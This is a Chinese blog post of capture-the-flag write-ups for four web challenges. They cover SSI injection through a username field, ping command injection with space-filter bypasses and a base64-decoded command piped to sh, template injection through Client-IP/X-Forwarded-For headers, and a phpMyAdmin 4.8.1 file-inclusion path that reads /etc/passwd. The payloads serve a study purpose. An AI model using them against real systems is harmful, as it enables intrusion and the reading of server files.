时间戳

首页 > 技术文章 > buuoj_command_execution

buuoj_command_execution

wkzb 2020-03-01 18:29 原文

[BJDCTF2020]EasySearch

扫描一下目录,发现.swp备份文件源码泄露

<?php
    ob_start();
    function get_hash(){
        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
        $content = uniqid().$random;
        return sha1($content); 
    }
    header("Content-Type: text/html;charset=utf-8");
    ***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
            ***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
            echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
    ***
    }
    ***
?>

 

审计一下,逻辑是首先随机获取文件名的一个函数,让password前6个字符的md5加密值等于6d0bc1,然后会在public目录下创建一个shtml文件,再将post传参的username字段写入这个shtml文件中。

前6个字符的md5值等于6d0bc1的脚本如下:

import hashlib
def md5(s):
    return hashlib.md5(s.encode('utf-8')).hexdigest()
for i in range(1, 10000000):
    if md5(str(i)).startswith('6d0bc1'):
        print(i)
        break

 

跑出结果是2020666,先测试一下网站基本功能,用户名aaa,密码2020666登录进去,在network处获得文件路径(抓包也可以看到)

 

访问查看结果

 

利用SSI注入漏洞,我们可以在username变量中传入ssi语句来远程执行系统命令。

<!--#exec cmd="命令"-->

(shtml是一种基于SSI技术的文件。SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。IIS和Apache都可以开启SSI功能)

(SSI注入的条件:

1.Web 服务器已支持SSI(服务器端包含)

2.Web 应用程序未对对相关SSI关键字做过滤

3.Web 应用程序在返回响应的HTML页面时,嵌入用户输入)

 

输入payload:<!--#exec cmd="ls ../"-->登录,访问network处的url

 

访问flag_990c66bf85a09c664f0b6741840499b2目录后得到flag

 

参考:

http://www.mamicode.com/info-detail-2936273.html

https://blog.csdn.net/qq_40657585/article/details/84260844

http://blog.gr0wth.top/index.php/00000/137.html

 

[GXYCTF2019]Ping Ping Ping

打开题目,提示在 url 传入 ip 参数

 

传入 127.0.0.1 发现服务器执行 ping 命令

 

用分号拼接 linux 命令(顺便复习一下命令连接符分号是依次顺序执行;&&第一个命令成功第二个命令才会执行;||第一个命令成功第二个命令不执行,第一个命令失败第二个执行;|是命令1的正确输出作为命令2的操作对象)

 

过滤了空格,$IFS$9 绕过后也无法直接读取 flag.php,先读一下 index.php(若不过滤的话,还有 ${IFS}、<、<> 等多种方式可以绕过过滤空格)

 

payload1,内联执行,将反引号内命令的输出作为输入执行

/?ip=127.0.0.1;cat$IFS$1`ls`

 

payload2,命令执行变量拼接

/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

 

payload3,过滤 flag、bash,用 sh 执行(Y2F0IGZsYWcucGhw 是 cat flag.php 的 base64-encode)

/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

 

参考:

https://www.ghtwf01.cn/index.php/archives/273/

 

[BJDCTF2020]The mystery of ip

浏览题目 flag.php 页面和 ip 有关,发现 Client-IP 和 XFF 可以控制输入

 

尝试逻辑运算 {1*2} 和执行系统命令 {system('cat /flag')} 得到 flag

 

[GWCTF 2019]我有一个数据库

扫目录发现 /phpmyadmin,版本是 4.8.1

存在文件包含漏洞,使用网上的 payload 读到 flag

?target=db_datadict.php%253f/../../../../../../../../etc/passwd
?target=db_datadict.php%253f/../../../../../../../../flag

 

推荐阅读